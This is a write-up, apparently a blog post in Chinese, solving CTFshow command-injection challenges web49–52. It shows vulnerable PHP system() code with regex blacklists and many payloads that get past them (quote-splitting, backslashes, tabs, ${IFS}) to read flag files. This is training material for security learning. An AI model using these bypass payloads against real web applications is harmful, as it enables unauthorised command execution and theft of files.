CTFshow系列——命令执行web49-52

提示：文章写完后，目录可以自动生成，如何生成可参考右边的帮助文档

Web49

不多说，直接看代码：

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

这里我们与Web48关，进行对比，发现只是增加了 % 的过滤；

我们还可以用\ 和‘’单引号来执行payload：

# payload
?c=tac%09fla?.php||
?c=tac<f''lag.php||
?c=tac<fla%27%27g.php||# 查看源代码
?c=c\at<fl\ag.php||

其实payload是一样的，没有改变：

Web50

还是直接看代码，这里都能看出来不同：

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

多了对\x09 和\x26的过滤：

那么多了这两个作用是什么？

• \x09和 \x26 的过滤都是为了让命令注入变得更难，它们分别用于防范：

• \x09: 防止攻击者使用制表符来代替空格，从而执行带有参数的命令。

  • 作用：代码已经过滤了空格 ，攻击者无法使用 ls -al 这样的命令。然而，如果 \x09 没有被过滤，攻击者就可以用制表符来代替空格
  • 攻击示例：
  • 原始命令：ls -al
  • 绕过后的命令：ls%09-al

• \x26: 防止攻击者使用 & 符号来执行多条命令或将命令放入后台。
  • 作用：过滤 & 和 && 是为了进一步限制攻击者执行多个命令
• 攻击示例：

  • 原始攻击：ls; cat flag.php （已被分号过滤）

  • & 绕过：ls & cat flag.php

  • && 绕过：ls && cat flag.php

那照这么说，我们的 payload：?c=tac%09fla?.php|| 岂不是用不了了？
事实证明，确实用不了。。。

但是其他payload还是不受影响的：

?c=tac<f''lag.php||
?c=tac<fla%27%27g.php||# 查看源代码
?c=c\at<fl\ag.php||

Web51（新payload，打开思路）

还是看代码：

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

这里竟然把我们最爱的tac 都给过滤掉了，那我们还能用什么方法进行过滤？

tac被过滤，就用nl
既然'' 能够过滤f’'lag，那么为什么不试试t' 'ac呢？

# payload
?c=nl<f''lag.php||# 这个也不能忘记
?c=c\at<fl\ag.php||
?c=t\ac<fl\ag.php||
?c=n\l<fl\ag.php||
?c=mor\e<fl\ag.php||
?c=les\s<fl\ag.php||# 同理，查看源代码
?c=t''ac<f''lag.php||
?c=mor''e<fla''g.php||
?c=les''s<fla''g.php||

其他的尝试：
这里还尝试进行Web43，想将flag.php复制到out.txt文件，发现还是不行。

Web52

直接看代码：

<?phpif(isset($_GET['c'])){$c=$_GET['c'];if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){system($c." >/dev/null 2>&1");}
}else{highlight_file(__FILE__);
}

分析代码得知，多了对< > 的过滤：

还是那个问题：
接下来我们要找<的替代品，或者 空格 的另一种绕过方式；

• > < &被过滤了，就用${IFS}
  • ${IFS} 的含义：IFS 全称为 “Internal Field Separator”（内部字段分隔符），默认值包含空格、制表符和换行符。在命令行里，${IFS} 可以用来替代空格。
  • 原因：正则表达式过滤了空格字符 ，但没有对 ${IFS} 进行过滤。
  • 所以，当把命令写成ls${IFS}-l时，在正则表达式的检查中，因为不存在被过滤的空格字符，该命令就能通过检查。

当然，我们还可以尝试\ 的payload是否能用：

尝试payload

这里我们输入命令后，发现了东西，但好像有没发现：

?c=t''ac${IFS}f''lag.php||

是这个字符串的md5值吗，输入进入发现也不是：ctfshow{48dbb53bc7c946dc4b9b8c782b054551}

那我们进入别的目录查找：

# 查看根目录查看
?c=ls${IFS}/||

发现flag目录，进入查看是否有flag：

?c=t''ac${IFS}/f''lag||

好了，得到flag，下面我帮大家把能试出来的都试出来了：

注意：这里关于 反引号 和 \ 作用是一样的，都可以相互替换，我就不进行枚举了：

?c=t''ac${IFS}/f''lag||
?c=c''at${IFS}/f''lag||
?c=nl${IFS}/f''lag||
?c=m''ore${IFS}/f''lag||
?c=l''ess${IFS}/f''lag||# 查看源代码
?c=c\at${IFS}/fl\ag||
?c=t\ac${IFS}/fl\ag||
?c=n\l${IFS}/fl\ag||
?c=mor\e${IFS}/fl\ag||
?c=les\s${IFS}/fl\ag||

好了，差不多就这么点东西了；

总结

本次也是给大家提供了很多payload，但其实规律都是一样的：通过特殊字符进行关键词的绕过，然后再逐渐尝试；